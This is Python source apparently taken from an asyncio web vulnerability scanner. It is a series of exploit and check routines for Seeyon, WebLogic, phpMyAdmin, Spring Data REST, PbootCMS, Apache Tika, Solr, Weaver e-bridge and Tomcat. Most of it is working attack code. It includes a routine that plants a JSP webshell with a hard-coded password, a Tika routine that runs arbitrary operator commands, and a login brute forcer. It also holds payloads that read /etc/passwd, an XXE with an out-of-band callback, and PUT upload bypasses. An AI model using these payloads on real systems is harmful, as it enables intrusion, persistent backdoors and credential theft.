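            async with session.post(url=query_url) as response:
                if response is None:
                    continue
                if int(response.status) == 401:
                    sys.exit(logger.error("Error fofa api access, maybe you should pay fofa coin and enjoy service."))
                res = await response.text()
                if res is None:
                    continue
                res_json = json.loads(res)
                if res_json["error"] is not None:
                    continue
                results = res_json.get('results') or []
                if not results:
                    break
                for item in results:
                    logger.debug("Fofa Found: %s" % item[0])
                    yield item[0]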
async def upload(self):
    """Seeyon ``htmlofficeservlet`` file write — JSP webshell variant.

    Same DBSTEP V3.0 write primitive as the text-marker check, but the
    payload is a JSP: ``excuteCmd`` runs ``request.getParameter("cmd")``
    through ``Runtime.exec`` when ``pwd`` equals the hard-coded
    ``test12345`` and answers ``:-)`` otherwise.  After the POST the file is
    fetched at ``seeyon/test<random>.jsp``; a ``:-)`` body means the shell is
    live, and the record's ``info`` is a ready-to-use
    ``?pwd=test12345&cmd=whoami`` URL under "seeyon getshell".

    WARNING: this plants a persistent backdoor protected only by a static,
    well-known password; anyone who finds the file can run commands on the
    host.  Delete it as soon as the engagement allows.
    """
    await self.get_url()
    if not self.base_url:
        return
    alphabet = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'
    shell_name = 'test' + str(random.randint(100000, 999999)) + '.jsp'
    encoded_path = str(base64encode(
        '..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format(shell_name), alphabet))
    servlet_url = self.base_url + 'seeyon/htmlofficeservlet'
    async with ClientSession() as session:
        async with session.get(url=servlet_url) as banner:
            if banner is None or 'DBSTEP V3.0' not in await banner.text():
                return
            body = ('''DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME='''
                    + encoded_path
                    + '''\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66\r\n<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("test12345".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>c0a4500844f330626a5f11e1563b03f2''')
            async with session.post(url=servlet_url, data=body) as write_res:
                # Let the servlet finish writing before reading back.
                await asyncio.sleep(1)
                shell_url = self.base_url + 'seeyon/' + shell_name
                async with session.get(url=shell_url) as shell_res:
                    if shell_res is None:
                        return
                    if ':-)' in await shell_res.text():
                        self.flag = 1
                        self.res.append({
                            "info": shell_url + '?pwd=test12345&cmd=whoami',
                            "key": 'seeyon getshell'
                        })
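async def prove(self):
    """WebLogic console login brute force (``console/j_security_check``).

    Username/password lists come from ``self.parameter['U']`` / ``['P']``
    (files read with ``self.read_file``) or default to
    ``weblogic_usernames.txt`` / ``weblogic_passwords.txt`` in
    ``paths.DICT_PATH``.  Each pair from ``self.generate_dict`` is POSTed; a
    302 whose ``Location`` points into ``/console`` but not back to
    ``/login/LoginForm.jsp`` is treated as a successful login, recorded as
    ``"<user>/<password>"`` under "weblogic burst", and the method returns.

    Fix: the form body was built by string formatting, so a ``&``, ``=``,
    ``%`` or ``+`` in a candidate corrupted the request.  The fields are now
    passed as a dict and URL-encoded by the client (same field names and
    order, plus ``j_character_encoding=UTF-8``).

    WARNING: too many failed logins lock the WebLogic account; keep the
    lists short (the original author suggests fewer than five attempts).
    """
    await self.get_url()
    if not self.base_url:
        return
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    if 'U' in self.parameter.keys():
        usernamedic = self.read_file(self.parameter['U'])
    else:
        usernamedic = self.read_file(os.path.join(paths.DICT_PATH, 'weblogic_usernames.txt'))
    if 'P' in self.parameter.keys():
        passworddic = self.read_file(self.parameter['P'])
    else:
        passworddic = self.read_file(os.path.join(paths.DICT_PATH, 'weblogic_passwords.txt'))
    url = self.base_url + 'console/j_security_check'
    async with ClientSession() as session:
        async for (username, password) in self.generate_dict(usernamedic, passworddic):
            form = {
                'j_username': username,
                'j_password': password,
                'j_character_encoding': 'UTF-8',
            }
            async with session.post(url=url, data=form, headers=headers, allow_redirects=False) as res:
                if res is None or res.status != 302:
                    continue
                location = res.headers.get('Location', '')
                # A successful login redirects into the console; a failure
                # bounces back to the login form.
                if '/console' in location and '/login/LoginForm.jsp' not in location:
                    self.flag = 1
                    self.res.append({
                        "info": username + "/" + password,
                        "key": "weblogic burst"
                    })
                    return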
async def prove(self):
    """phpMyAdmin ``scripts/setup.php`` PMA_Config deserialization file read.

    For each candidate install path, ``action=test`` is POSTed with a
    serialized ``PMA_Config`` whose ``source`` is ``/etc/passwd`` (Linux) or
    ``C:\\Windows\\win.ini`` (Windows).  A vulnerable setup.php unserializes
    the object and reads that file, so 'root:' or '[extensions]' in the
    reply confirms it; recorded as "phpmyadmin_setup_deserialization" and
    the method returns.
    """
    await self.get_url()
    if not self.base_url:
        return
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    payloads = (
        'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}',
        'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:18:"C:\\Windows\\win.ini";}',
    )
    install_paths = self.url_normpath(self.url, [
        './phpMyAdmin/',
        './pma/',
        '/phpmyadmin/',
        './',
    ])
    async with ClientSession() as session:
        for base in install_paths:
            setup_url = base + 'scripts/setup.php'
            for body in payloads:
                async with session.post(url=setup_url, headers=headers, data=body, allow_redirects=False) as res:
                    if not res:
                        continue
                    text = await res.text()
                    if 'root:' in text or '[extensions]' in text:
                        self.flag = 1
                        self.res.append({
                            "info": setup_url,
                            "key": "phpmyadmin_setup_deserialization"
                        })
                        return
async def prove(self):
    """Spring Data REST CVE-2017-8046: SpEL injection via JSON-Patch ``path``.

    Two ``application/json-patch+json`` bodies are PATCHed to each candidate
    path; their ``path`` is a SpEL expression calling ``Runtime.exec`` with
    ``new String(new byte[]{119,104,111,97,109,105})`` (``whoami``).  The
    check looks for "SpelEvaluation" in the reply — the evaluation error
    text a vulnerable server emits — and records "Spring RCE CVE-2017-8046";
    ``break`` moves on to the next path.
    """
    await self.get_url()
    if not self.base_url:
        return
    bases = list(set([
        self.url_normpath(self.base_url, '/'),
        self.url_normpath(self.url, './'),
        self.url_normpath(self.url, '')
    ]))
    headers = {
        "Content-Type": "application/json-patch+json",
    }
    patches = (
        '[{"op":"add","path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{119, 104, 111, 97, 109, 105}))/foo"}]',
        '[{"op":"add","path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{119, 104, 111, 97, 109, 105}))[foo]"}]',
    )
    async with ClientSession() as session:
        for base in bases:
            for body in patches:
                async with session.patch(url=base, data=body, headers=headers) as res:
                    if not res:
                        continue
                    if "SpelEvaluation" in await res.text():
                        self.flag = 1
                        self.res.append({
                            "info": base,
                            "key": "Spring RCE CVE-2017-8046"
                        })
                        break
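async def prove(self):
    """PbootCMS 1.3.2 template-tag RCE via the ``keyword`` parameter.

    Each candidate base path is tried with several ``{pboot:if ...}``
    payloads that smuggle PHP into the template condition and call
    ``phpinfo`` (via ``eval($_REQUEST[1])`` or a ``$_GET``-supplied function
    name).  'php.ini' in the body confirms execution and is recorded as
    "pbootcms v1.3.2 rec"; the first hit per path breaks to the next path.

    Fix: the first two payload strings in the list had no comma between
    them, so Python concatenated them into one (never-matching) URL and the
    ``index/index`` ``eval`` variant was never sent on its own.
    """
    await self.get_url()
    if not self.base_url:
        return
    bases = list(set([
        self.url_normpath(self.base_url, '/'),
        self.url_normpath(self.base_url, '../PbootCMS/'),
        self.url_normpath(self.url, 'PbootCMS/'),
        self.url_normpath(self.url, '../PbootCMS/'),
    ]))
    payloads = [
        "index.php/index/index?keyword={pboot:if(eval($_REQUEST[1]));//)})}}{/pboot:if}&1=phpinfo();",
        "index.php/index/index?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo",
        "index.php/Content/2?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo",
        "index.php/List/2?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo",
        "index.php/About/2?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo",
        "index.php/Search/index?keyword={pboot:if(1)$a=$_GET[title];$a();//)})}}{/pboot:if}&title=phpinfo",
    ]
    async with ClientSession() as session:
        for base in bases:
            for poc in payloads:
                url = base + poc
                async with session.get(url=url) as res:
                    if res is None:
                        continue
                    text = await res.text()
                    if "php.ini" in text:
                        self.flag = 1
                        self.req.append({"url": url})
                        self.res.append({"info": url, "key": "pbootcms v1.3.2 rec"})
                        break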
async def prove(self):
    """HTTP PUT upload check (WebDAV / misconfigured servers).

    An OPTIONS request to ``<path>testbyme`` must advertise ``PUT`` in its
    ``Allow`` header; then the body ``test`` is PUT to three variants of a
    timestamp-named ``.jsp`` (``.jsp/``, ``.jsp::$DATA``, ``.jsp%20``), the
    classic parser-bypass spellings.  A 201 or 204 sets ``self.flag`` and
    records "PUT" for that URL.

    NOTE(review): every successful PUT leaves a file on the target, and all
    three variants are tried even after a hit.
    """
    await self.get_url()
    if self.base_url is None:
        return
    bases = {
        self.url_normpath(self.base_url, '/'),
        self.url_normpath(self.url, './'),
    }
    async with ClientSession() as session:
        for base in bases:
            async with session.options(url=base + "testbyme") as opts:
                if opts is None:
                    continue
                allowed = opts.headers.get('Allow')
                if allowed is None or 'PUT' not in allowed:
                    continue
                for suffix in ('.jsp/', '.jsp::$DATA', '.jsp%20'):
                    target = base + str(int(time.time())) + suffix
                    async with session.put(url=target, data='test') as put_res:
                        if put_res is not None and put_res.status in (201, 204):
                            self.flag = 1
                            self.req.append({"method": "put"})
                            self.res.append({
                                "info": target,
                                "key": "PUT"
                            })
async def prove(self):
    """Apache Solr CVE-2017-12629 XXE via the ``xmlparser`` query parser.

    ``admin/cores?wt=json`` (under the base URL and ``solr/``) is read to
    learn a core name; a ``select`` query against that core carries a
    percent-encoded DOCTYPE whose parameter entity points at an out-of-band
    URL token.  ``ceye_verify_api(token, 'http')`` seeing the fetch sets
    ``self.flag`` and records "CVE-2017-12629" with the cores URL.
    """
    await self.get_url()
    if not self.base_url:
        return
    async with ClientSession() as session:
        callback = self.ceye_dns_api(t='url')
        for base in (self.base_url, self.base_url + "solr/"):
            cores_url = base + 'admin/cores?wt=json'
            async with session.get(url=cores_url, allow_redirects=False) as cores_res:
                if not cores_res or cores_res.status != 200:
                    continue
                text = await cores_res.text()
                if 'responseHeader' not in text:
                    continue
                found = re.search(r'"name":"(?P<core>.*?)"', text)
                if not found:
                    continue
                core = found.group(1)
                xxe_url = base + core + '/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22{dns}%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser'.format(dns=callback)
                async with session.get(url=xxe_url) as xxe_res:
                    if not xxe_res:
                        continue
                    if await self.ceye_verify_api(callback, 'http'):
                        self.flag = 1
                        self.res.append({
                            "info": cores_url,
                            "key": "CVE-2017-12629"
                        })
                        return
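async def prove(self):
    """Fingerprint the page at ``self.url`` against a keyword list.

    Fetches ``self.url`` once, decodes the body as UTF-8 (falling back to
    GBK, then to the literal ``"[Error Code]"``), pulls the ``<title>`` from
    the lower-cased body (``'[None Title]'`` if absent) and tests every
    keyword from ``self.parameter['keyword']`` (or the default
    ``dict/web_content_key.txt``, read in binary via ``self.read_file``) for
    a substring match.  Matches are joined with ``,`` and recorded as
    ``{"info": <title>, "key": <matches>}``; ``self.flag`` is set on any hit.

    Fixes: the title pattern was a non-raw string containing ``\\/`` (an
    invalid escape, warned about on current Python); it is now a raw pattern
    with the same meaning.  The bare ``except`` clauses are narrowed to
    ``Exception`` so task cancellation is not swallowed, the GBK fallback is
    itself guarded (it used to propagate), and a keyword line that is not
    valid UTF-8 is skipped instead of aborting the whole check.

    NOTE(review): the default dictionary path is relative to the process CWD.
    """
    await self.get_url()
    if not self.url:
        return
    if 'keyword' in self.parameter.keys():
        keyword_lines = self.read_file(self.parameter['keyword'], 'rb')
    else:
        keyword_lines = self.read_file('dict/web_content_key.txt', 'rb')
    async with ClientSession() as session:
        async with session.get(url=self.url) as response:
            if response is None:
                return
            raw = await response.read()
            try:
                body = str(raw, 'utf-8')
            except UnicodeDecodeError:
                try:
                    body = str(raw, 'gbk')
                except Exception:
                    body = "[Error Code]"
            title_match = re.search(r'<title>(.*)</title>', body.lower())
            if title_match is not None and title_match.group(1):
                title = title_match.group(1)
            else:
                title = '[None Title]'
            hits = []
            for line in keyword_lines:
                try:
                    keyword = str(line, 'utf-8').replace("\r", "").replace("\n", "")
                except UnicodeDecodeError as e:
                    print(e)
                    continue
                if keyword in body:
                    hits.append(keyword)
                    self.flag = 1
            if self.flag == 1:
                self.res.append({"info": title, "key": ','.join(hits)})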
async def exec(self):
    """Apache Tika server RCE via OCR headers (Windows targets).

    A PUT to ``<base>meta`` with ``X-Tika-OCRTesseractPath: "cscript"`` and
    ``X-Tika-OCRLanguage: //E:Jscript`` makes tika-server run ``cscript`` on
    the request body, a JScript snippet that executes
    ``cmd /c <self.parameter['cmd']>`` through ``WScript.Shell``.  A reply
    containing both 'X-Parsed-By' and 'tika.parse' is taken as success; the
    whole response text is recorded under "Apache Tika-server RCE".

    NOTE(review): ``self.parameter['cmd']`` is pasted into a single-quoted
    JScript string unescaped — a ``'`` in the command breaks the script.
    This is an ``exec`` routine: it runs the operator's command on the
    target, not just a harmless probe.
    """
    await self.get_url()
    if not self.base_url:
        return
    headers = {
        "X-Tika-OCRTesseractPath": "\"cscript\"",
        "X-Tika-OCRLanguage": "//E:Jscript",
        "Expect": "100-continue",
        "Content-type": "image/jp2",
        "Connection": "close"
    }
    meta_url = self.base_url + "meta"
    script = '''var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c {}');
'''.format(self.parameter['cmd'])
    async with ClientSession() as session:
        async with session.put(url=meta_url, headers=headers, data=script) as res:
            if res is None:
                return
            text = await res.text()
            if "X-Parsed-By" in text and "tika.parse" in text:
                self.flag = 1
                self.req.append({"flag": meta_url})
                self.res.append({
                    "info": text,
                    "key": "Apache Tika-server RCE"
                })
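async def prove(self):
    """Detect a web-server directory listing at the candidate base paths.

    Each path is fetched with GET; a 200 whose body matches one of the
    listing signatures (Apache "Index of /", IIS "[To Parent Directory]", a
    "Directory Listing" table summary, ...) sets ``self.flag``, records
    "directory_list" for that URL and returns.

    Fixes: the IIS signature ``">[To Parent Directory]</a><br><br>`` was
    compiled as a regex where ``[To Parent Directory]`` is a character class
    (it matched ``">`` + any one of those letters + ``</a>...``); the
    brackets are now escaped.  The body is decoded as text instead of
    ``str(bytes)``, which yielded a ``b'...'`` repr with escaped quotes and
    ``\\xNN`` sequences.  ``search`` replaces ``findall`` since only a hit
    is needed.
    """
    await self.get_url()
    if not self.base_url:
        return
    signatures = (
        re.compile(r'<title>Index of /', re.I),
        re.compile(r'<a href="?C=N;O=D">Name</a>', re.I),
        re.compile(r'<A HREF="?M=A">Last modified</A>', re.I),
        re.compile(r'Last modified</a>', re.I),
        re.compile(r'Parent Directory</a>', re.I),
        re.compile(r'<TITLE>Folder Listing.', re.I),
        re.compile(r'<table summary="Directory Listing', re.I),
        re.compile(r'">\[To Parent Directory\]</a><br><br>', re.I),
        re.compile(r'<dir> <A HREF="/', re.I),
        re.compile(r'<pre><A HREF="/">\[', re.I),
    )
    bases = list(set([
        self.url_normpath(self.base_url, '/'),
        self.url_normpath(self.url, './'),
        self.url_normpath(self.url, '../'),
    ]))
    async with ClientSession() as session:
        for url in bases:
            async with session.get(url=url) as response:
                if not response or response.status != 200:
                    continue
                # Lenient decode: the signatures are ASCII, so odd bytes in
                # the body only need to not abort the check.
                text = (await response.read()).decode('utf-8', errors='replace')
                if any(sig.search(text) for sig in signatures):
                    self.flag = 1
                    self.res.append({"info": url, "key": "directory_list"})
                    return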
async def prove(self):
    """Weaver e-bridge ``saveYZJFile`` arbitrary file read (SSRF to ``file://``).

    ``wxjsapi/saveYZJFile`` is asked to download ``file:///etc/passwd`` or
    ``file:///c://windows/win.ini``; a 200 reply carrying ``id``,
    ``filepath`` and ``name`` is parsed as JSON and the stored copy is read
    back through ``file/fileNoLogin/<id>``.  'root:x:' or '[extensions]' in
    that body confirms the read; recorded as "weaver e-bridge lfl" (sic) and
    the method returns.

    NOTE(review): ``self.url_normpath(self.url, './')`` is iterated here as
    a collection — confirm it returns one in this call form.
    """
    await self.get_url()
    if not self.base_url:
        return
    probes = (
        "wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt",
        "wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt",
    )
    async with ClientSession() as session:
        for base in self.url_normpath(self.url, './'):
            for probe in probes:
                save_url = base + probe
                async with session.get(url=save_url) as save_res:
                    if save_res is None or save_res.status != 200:
                        continue
                    text = await save_res.text()
                    if not ('id' in text and 'filepath' in text and 'name' in text):
                        continue
                    file_id = json.loads(text).get('id', '')
                    if not file_id:
                        continue
                    read_url = base + 'file/fileNoLogin/' + str(file_id)
                    async with session.get(url=read_url) as read_res:
                        if read_res is None or read_res.status != 200:
                            continue
                        content = await read_res.text()
                        if '[extensions]' in content or 'root:x:' in content:
                            self.flag = 1
                            self.req.append({"url": read_url})
                            self.res.append({
                                "info": save_url,
                                "key": "weaver e-bridge lfl"
                            })
                            return
async def prove(self):
    """Recognise Apache Tomcat default pages (root, docs, manager, examples, host-manager).

    Each URL is fetched and matched against four signatures: a 200 with
    'Apache Tomcat Examples'; a 401 with '401 Unauthorized' and 'tomcat'; a
    403 with '403 Access Denied' and 'tomcat-users'; or a 200 with
    'Documentation', 'Apache Software Foundation' and 'tomcat'.  Every match
    sets ``self.flag``, appends ``{"page": 'tomcat page'}`` to ``self.req``
    and records "tomcat page" for that URL (all URLs are tried).
    """
    await self.get_url()
    if self.base_url is None:
        return
    candidates = [self.base_url + suffix
                  for suffix in ("", "docs/", "manager/", "examples/", "host-manager/")]

    def looks_like_tomcat(status, text):
        return (
            (status == 200 and 'Apache Tomcat Examples' in text)
            or (status == 401 and '401 Unauthorized' in text and 'tomcat' in text)
            or (status == 403 and '403 Access Denied' in text and 'tomcat-users' in text)
            or (status == 200 and 'Documentation' in text
                and 'Apache Software Foundation' in text and 'tomcat' in text)
        )

    async with ClientSession() as session:
        for url in candidates:
            async with session.get(url=url) as res:
                if not res:
                    continue
                text = await res.text()
                if looks_like_tomcat(res.status, text):
                    self.flag = 1
                    self.req.append({"page": 'tomcat page'})
                    self.res.append({"info": url, "key": "tomcat page"})